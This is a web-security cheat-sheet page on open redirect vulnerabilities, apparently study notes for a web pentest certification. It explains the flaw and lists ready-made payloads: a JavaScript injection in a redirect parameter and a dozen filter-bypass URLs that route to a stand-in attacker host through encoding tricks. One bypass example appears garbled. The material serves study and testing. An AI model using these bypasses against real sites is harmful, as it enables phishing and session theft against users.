👑
Cheet Sheet: AWS, BSCP, HTB
  • 🔹Script Kiddies🔹
    • Wifi Cracking
    • Spam
    • Malware
    • Crypto
  • 🔹AWS🔹
    • AWS Certified Security - Specialty
  • 🔹BSCP🔹
    • #1 Web Attack Cheat Sheet
    • #2 Web Attack: Cheat Sheet
    • BAPP EXTENTIONS
    • 1. Essential skills
    • 2. Information disclosure
    • 3 .HTTP Host headers
    • 4. Authentication
    • 5. OAuth Authentication
    • 6. Broken access control
    • IDOR
    • 7. Path traversal
    • 8. File upload vuln
    • 9. Open Redirect
    • 10. Web Cache Poisoning
    • CSP
    • DOM clobbering
    • 11. Prototype Pollution
    • 12. Web messages
    • 13. WebSockets
    • HTTP request smuggling
    • OS Command Injection
    • Dangling markup injection
    • CORS
    • Logic Flaws
    • Insecure deserialization
    • JWT
    • Clickjacking
    • Race Condition
    • LFI / RFI
    • CSRF
    • SSRF
    • SSTI
    • XXE
    • XSS
    • XSS PAYLOADS
    • GRAPHQL
    • NoSQL Injection
    • SQL Injection
  • 🔹HTB🔹
    • CTF
    • Starting Point
    • TIER: 1
    • TIER: 2
  • 🔹HTB: LINUX OSCP PREP🔹
    • Lame Writeup
    • Brainfuck Writeup
    • Shocker Writeup
    • Bashed Writeup
    • Nibbles
    • Tabby
    • Cronos
    • Nineveh
    • Sense
    • SolidState
    • Node
    • Valentine
    • Poison
    • Sunday
    • TartarSauce
    • Irked
    • FriendZone
    • SwagShop
    • Networked
    • Jarvis
    • Magic
    • Delivery
    • Paper
    • Armageddon
    • Knife
    • Previse
    • Soccer
    • OpenAdmin
  • 🔹HTB: WINDOWS OSCP PREP🔹
    • Legacy
    • Blue
    • Devel
    • Optimum
    • Bastard
    • Granny
    • Artic
    • Grandpa
    • Silo
    • Bounty
    • Jerry
    • Conceal
    • Chatterbox
    • Forest #1 AD
    • Active #2 AD
    • Sauna #3 AD
    • Resolute #4 AD
    • Cascade #5 AD
    • Bastion
    • ServMon
    • Buff
    • Toolbox
    • Driver
    • Return
    • Timelapse
    • Love
    • Monteverde
    • Fuse
    • Scrambled
Powered by GitBook
On this page
  1. 🔹BSCP🔹

9. Open Redirect

Previous8. File upload vulnNext10. Web Cache Poisoning

Last updated 1 year ago

An open redirect vulnerability occurs when a web application or server uses unvalidated, user-supplied input to redirect users to other sites. This can allow an attacker to craft a link to the vulnerable site which redirects to a malicious site of their choosing. Attackers can leverage this vulnerability in phishing campaigns, session theft, or forcing a user to perform an action without their consent.

https://example.com/redirect?url=https://userpreferredsite.com
https://example.com?redirect_to=https://                %22%20accesskey%3dx%20onclick%3dalert(1)%2f%2f

location="http://exodussec.com"

document.location = "http://google.com"

document.location.href="http://google.com"

window.location.assign("http://google.com")

window['location']['href']="http://google.com"

window.name='1;var Uncaught=1;alert(23)';
location='xss_short.html';

Open redirect bypasses

Simply try to change the domain:

?redirect=https://example.com --> ?redirect=https://evil.com

Bypass the filter when protocol is blacklisted using //

?redirect=https://example.com --> ?redirect=//evil.com

Bypass the filter when double slash is blacklisted using \\

?redirect=https://example.com --> ?redirect=levil.com

Bypass the filter when double slash is blacklisted using http: or https:

?redirect=https://example.com --> ?redirect=https:example.com

Bypass the filter using %40

?redirect=example.com --> ?redirect=example.com%40evil.com

Bypass the filter if it only checks for domain name

?redirect=example.com --> ?redirect=example.comevil.com

Bypass the filter if it only checks for domain name using a dot %2e

?redirect=example.com --> ?redirect=example.com%2eevil.com

Bypass the filter if it only checks for domain name using a query/question mark ?

?redirect=example.com --> ?redirect=evil.com?example.com

Bypass the filter if it only checks for domain name using a hash %23

?redirect=example.com --> ?redirect=evil.com%23example.com

Bypass the filter using a symbol

?redirect=example.com --> ?redirect=example.com/°evil.com

Bypass the filter using a url encoded Chinese dot %E3%80%82

?redirect=example.com --> ?redirect=evil.com%E3%80%82%23example.com

Bypass the filter if it only allows you to control the path using a nullbyte %0d or %0a

?redirect=/ --> ?redirect=/%0d/evil.com
PayloadsAllTheThings/Open Redirect at master · swisskyrepo/PayloadsAllTheThingsGitHub
https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md
Logo